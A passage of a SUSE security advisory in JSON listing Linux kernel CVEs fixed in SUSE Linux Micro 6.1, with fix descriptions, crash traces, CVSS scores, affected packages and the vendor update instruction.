"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68168"
},
{
"cve": "CVE-2025-68171",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68171"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/fpu: Ensure XFD state on signal delivery\n\nSean reported [1] the following splat when running KVM tests:\n\n WARNING: CPU: 232 PID: 15391 at xfd_validate_state+0x65/0x70\n Call Trace:\n \u003cTASK\u003e\n fpu__clear_user_states+0x9c/0x100\n arch_do_signal_or_restart+0x142/0x210\n exit_to_user_mode_loop+0x55/0x100\n do_syscall_64+0x205/0x2c0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n\nChao further identified [2] a reproducible scenario involving signal\ndelivery: a non-AMX task is preempted by an AMX-enabled task which\nmodifies the XFD MSR.\n\nWhen the non-AMX task resumes and reloads XSTATE with init values,\na warning is triggered due to a mismatch between fpstate::xfd and the\nCPU\u0027s current XFD state. fpu__clear_user_states() does not currently\nre-synchronize the XFD state after such preemption.\n\nInvoke xfd_update_state() which detects and corrects the mismatch if\nthere is a dynamic feature.\n\nThis also benefits the sigreturn path, as fpu__restore_sig() may call\nfpu__clear_user_states() when the sigframe is inaccessible.\n\n[ dhansen: minor changelog munging ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68171",
"url": "https://www.suse.com/security/cve/CVE-2025-68171"
},
{
"category": "external",
"summary": "SUSE Bug 1255255 for CVE-2025-68171",
"url": "https://bugzilla.suse.com/1255255"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68171"
},
{
"cve": "CVE-2025-68172",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68172"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: aspeed - fix double free caused by devm\n\nThe clock obtained via devm_clk_get_enabled() is automatically managed\nby devres and will be disabled and freed on driver detach. Manually\ncalling clk_disable_unprepare() in error path and remove function\ncauses double free.\n\nRemove the manual clock cleanup in both aspeed_acry_probe()\u0027s error\npath and aspeed_acry_remove().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68172",
"url": "https://www.suse.com/security/cve/CVE-2025-68172"
},
{
"category": "external",
"summary": "SUSE Bug 1255253 for CVE-2025-68172",
"url": "https://bugzilla.suse.com/1255253"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68172"
},
{
"cve": "CVE-2025-68174",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68174"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\namd/amdkfd: enhance kfd process check in switch partition\n\ncurrent switch partition only check if kfd_processes_table is empty.\nkfd_prcesses_table entry is deleted in kfd_process_notifier_release, but\nkfd_process tear down is in kfd_process_wq_release.\n\nconsider two processes:\n\nProcess A (workqueue) -\u003e kfd_process_wq_release -\u003e Access kfd_node member\nProcess B switch partition -\u003e amdgpu_xcp_pre_partition_switch -\u003e amdgpu_amdkfd_device_fini_sw\n-\u003e kfd_node tear down.\n\nProcess A and B may trigger a race as shown in dmesg log.\n\nThis patch is to resolve the race by adding an atomic kfd_process counter\nkfd_processes_count, it increment as create kfd process, decrement as\nfinish kfd_process_wq_release.\n\nv2: Put kfd_processes_count per kfd_dev, move decrement to kfd_process_destroy_pdds\nand bug fix. (Philip Yang)\n\n[3966658.307702] divide error: 0000 [#1] SMP NOPTI\n[3966658.350818] i10nm_edac\n[3966658.356318] CPU: 124 PID: 38435 Comm: kworker/124:0 Kdump: loaded Tainted\n[3966658.356890] Workqueue: kfd_process_wq kfd_process_wq_release [amdgpu]\n[3966658.362839] nfit\n[3966658.366457] RIP: 0010:kfd_get_num_sdma_engines+0x17/0x40 [amdgpu]\n[3966658.366460] Code: 00 00 e9 ac 81 02 00 66 66 2e 0f 1f 84 00 00 00 00 00 90 0f 1f 44 00 00 48 8b 4f 08 48 8b b7 00 01 00 00 8b 81 58 26 03 00 99 \u003cf7\u003e be b8 01 00 00 80 b9 70 2e 00 00 00 74 0b 83 f8 02 ba 02 00 00\n[3966658.380967] x86_pkg_temp_thermal\n[3966658.391529] RSP: 0018:ffffc900a0edfdd8 EFLAGS: 00010246\n[3966658.391531] RAX: 0000000000000008 RBX: ffff8974e593b800 RCX: ffff888645900000\n[3966658.391531] RDX: 0000000000000000 RSI: ffff888129154400 RDI: ffff888129151c00\n[3966658.391532] RBP: ffff8883ad79d400 R08: 0000000000000000 R09: ffff8890d2750af4\n[3966658.391532] R10: 0000000000000018 R11: 0000000000000018 R12: 0000000000000000\n[3966658.391533] R13: ffff8883ad79d400 R14: ffffe87ff662ba00 R15: ffff8974e593b800\n[3966658.391533] FS: 0000000000000000(0000) GS:ffff88fe7f600000(0000) knlGS:0000000000000000\n[3966658.391534] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[3966658.391534] CR2: 0000000000d71000 CR3: 000000dd0e970004 CR4: 0000000002770ee0\n[3966658.391535] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[3966658.391535] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400\n[3966658.391536] PKRU: 55555554\n[3966658.391536] Call Trace:\n[3966658.391674] deallocate_sdma_queue+0x38/0xa0 [amdgpu]\n[3966658.391762] process_termination_cpsch+0x1ed/0x480 [amdgpu]\n[3966658.399754] intel_powerclamp\n[3966658.402831] kfd_process_dequeue_from_all_devices+0x5b/0xc0 [amdgpu]\n[3966658.402908] kfd_process_wq_release+0x1a/0x1a0 [amdgpu]\n[3966658.410516] coretemp\n[3966658.434016] process_one_work+0x1ad/0x380\n[3966658.434021] worker_thread+0x49/0x310\n[3966658.438963] kvm_intel\n[3966658.446041] ? process_one_work+0x380/0x380\n[3966658.446045] kthread+0x118/0x140\n[3966658.446047] ? __kthread_bind_mask+0x60/0x60\n[3966658.446050] ret_from_fork+0x1f/0x30\n[3966658.446053] Modules linked in: kpatch_20765354(OEK)\n[3966658.455310] kvm\n[3966658.464534] mptcp_diag xsk_diag raw_diag unix_diag af_packet_diag netlink_diag udp_diag act_pedit act_mirred act_vlan cls_flower kpatch_21951273(OEK) kpatch_18424469(OEK) kpatch_19749756(OEK)\n[3966658.473462] idxd_mdev\n[3966658.482306] kpatch_17971294(OEK) sch_ingress xt_conntrack amdgpu(OE) amdxcp(OE) amddrm_buddy(OE) amd_sched(OE) amdttm(OE) amdkcl(OE) intel_ifs iptable_mangle tcm_loop target_core_pscsi tcp_diag target_core_file inet_diag target_core_iblock target_core_user target_core_mod coldpgs kpatch_18383292(OEK) ip6table_nat ip6table_filter ip6_tables ip_set_hash_ipportip ip_set_hash_ipportnet ip_set_hash_ipport ip_set_bitmap_port xt_comment iptable_nat nf_nat iptable_filter ip_tables ip_set ip_vs_sh ip_vs_wrr ip_vs_rr ip_vs nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 sn_core_odd(OE) i40e overlay binfmt_misc tun bonding(OE) aisqos(OE) aisqo\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68174",
"url": "https://www.suse.com/security/cve/CVE-2025-68174"
},
{
"category": "external",
"summary": "SUSE Bug 1255327 for CVE-2025-68174",
"url": "https://bugzilla.suse.com/1255327"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68174"
},
{
"cve": "CVE-2025-68176",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68176"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nPCI: cadence: Check for the existence of cdns_pcie::ops before using it\n\ncdns_pcie::ops might not be populated by all the Cadence glue drivers. This\nis going to be true for the upcoming Sophgo platform which doesn\u0027t set the\nops.\n\nHence, add a check to prevent NULL pointer dereference.\n\n[mani: reworded subject and description]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68176",
"url": "https://www.suse.com/security/cve/CVE-2025-68176"
},
{
"category": "external",
"summary": "SUSE Bug 1255329 for CVE-2025-68176",
"url": "https://bugzilla.suse.com/1255329"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68176"
},
{
"cve": "CVE-2025-68178",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68178"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblk-cgroup: fix possible deadlock while configuring policy\n\nFollowing deadlock can be triggered easily by lockdep:\n\nWARNING: possible circular locking dependency detected\n6.17.0-rc3-00124-ga12c2658ced0 #1665 Not tainted\n------------------------------------------------------\ncheck/1334 is trying to acquire lock:\nff1100011d9d0678 (\u0026q-\u003esysfs_lock){+.+.}-{4:4}, at: blk_unregister_queue+0x53/0x180\n\nbut task is already holding lock:\nff1100011d9d00e0 (\u0026q-\u003eq_usage_counter(queue)#3){++++}-{0:0}, at: del_gendisk+0xba/0x110\n\nwhich lock already depends on the new lock.\n\nthe existing dependency chain (in reverse order) is:\n\n-\u003e #2 (\u0026q-\u003eq_usage_counter(queue)#3){++++}-{0:0}:\n blk_queue_enter+0x40b/0x470\n blkg_conf_prep+0x7b/0x3c0\n tg_set_limit+0x10a/0x3e0\n cgroup_file_write+0xc6/0x420\n kernfs_fop_write_iter+0x189/0x280\n vfs_write+0x256/0x490\n ksys_write+0x83/0x190\n 